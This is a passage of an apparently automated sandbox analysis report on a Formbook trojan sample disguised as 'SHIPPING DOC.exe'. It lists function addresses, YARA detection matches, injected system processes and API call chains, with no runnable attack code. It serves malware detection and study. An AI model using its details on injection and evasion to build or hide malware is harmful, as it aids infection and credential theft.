          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048603E611_2_048603E6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047AE3F011_2_047AE3F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485A35211_2_0485A352
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04840CB511_2_04840CB5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A0C0011_2_047A0C00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04790CF211_2_04790CF2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047AAD0011_2_047AAD00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0479ADE011_2_0479ADE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0483CD1F11_2_0483CD1F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047B8DBF11_2_047B8DBF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485CE9311_2_0485CE93
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A0E5911_2_047A0E59
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485EEDB11_2_0485EEDB
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485EE2611_2_0485EE26
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047B2E9011_2_047B2E90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0481EFA011_2_0481EFA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047C0F3011_2_047C0F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047E2F2811_2_047E2F28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047ACFE011_2_047ACFE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04792FC811_2_04792FC8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04842F3011_2_04842F30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04814F4011_2_04814F40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A284011_2_047A2840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047AA84011_2_047AA840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047CE8F011_2_047CE8F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047868B811_2_047868B8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047B696211_2_047B6962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0486A9A611_2_0486A9A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A29A011_2_047A29A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0479EA8011_2_0479EA80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04856BD711_2_04856BD7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485AB4011_2_0485AB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0479146011_2_04791460
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485F43F11_2_0485F43F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0483D5B011_2_0483D5B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048695C311_2_048695C3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485757111_2_04857571
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048516CC11_2_048516CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047E563011_2_047E5630
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485F7B011_2_0485F7B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0484F0CC11_2_0484F0CC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485F0E011_2_0485F0E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048570E911_2_048570E9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A70C011_2_047A70C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0478F17211_2_0478F172
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047D516C11_2_047D516C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047AB1B011_2_047AB1B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0486B16B11_2_0486B16B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_048412ED11_2_048412ED
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047BB2C011_2_047BB2C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A52A011_2_047A52A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0478D34C11_2_0478D34C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485132D11_2_0485132D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047E739A11_2_047E739A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485FCF211_2_0485FCF2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04819C3211_2_04819C32
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A3D4011_2_047A3D40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047BFDC011_2_047BFDC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04851D5A11_2_04851D5A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04857D7311_2_04857D73
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A9EB011_2_047A9EB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485FFB111_2_0485FFB1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485FF0911_2_0485FF09
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04763FD511_2_04763FD5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04763FD211_2_04763FD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A1F9211_2_047A1F92
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0480D80011_2_0480D800
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A38E011_2_047A38E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047A995011_2_047A9950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047BB95011_2_047BB950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0483591011_2_04835910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04841AA311_2_04841AA3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0483DAAC11_2_0483DAAC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0484DAC611_2_0484DAC6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04857A4611_2_04857A46
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485FA4911_2_0485FA49
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047E5AA011_2_047E5AA0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04813A6C11_2_04813A6C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_04815BF011_2_04815BF0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047DDBF911_2_047DDBF9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0485FB7611_2_0485FB76
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_047BFB8011_2_047BFB80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052C3F211_2_0052C3F2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_0052E79D11_2_0052E79D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_00512D9011_2_00512D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_00519E5011_2_00519E50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_00519E4C11_2_00519E4C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_00512FB011_2_00512FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044AA03611_2_044AA036
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A2D0211_2_044A2D02
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044AE5CD11_2_044AE5CD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A108211_2_044A1082
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A891211_2_044A8912
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044AB23211_2_044AB232
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A5B3211_2_044A5B32
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_044A5B3011_2_044A5B30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 277 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0481F290 appears 105 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 047E7E54 appears 111 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0478B970 appears 277 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 047D5130 appears 58 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0480EA12 appears 86 times
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: String function: 004115D7 appears 36 times
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: String function: 00416C70 appears 39 times
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: String function: 00445AE0 appears 65 times
          Source: SHIPPING DOC.exe, 00000000.00000003.1268361909.000000000432D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC.exe
          Source: SHIPPING DOC.exe, 00000000.00000003.1271316522.0000000004183000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOC.exe
          Source: SHIPPING DOC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.3714914384.000000000945C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: SHIPPING DOC.exe PID: 7280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 7980, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1032/1@12/1
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeFile created: C:\Users\user~1\AppData\Local\Temp\drawlinglyJump to behavior
          Source: SHIPPING DOC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SHIPPING DOC.exeVirustotal: Detection: 52%
          Source: SHIPPING DOC.exeReversingLabs: Detection: 44%
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeFile read: C:\Users\user\Desktop\SHIPPING DOC.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SHIPPING DOC.exe "C:\Users\user\Desktop\SHIPPING DOC.exe"
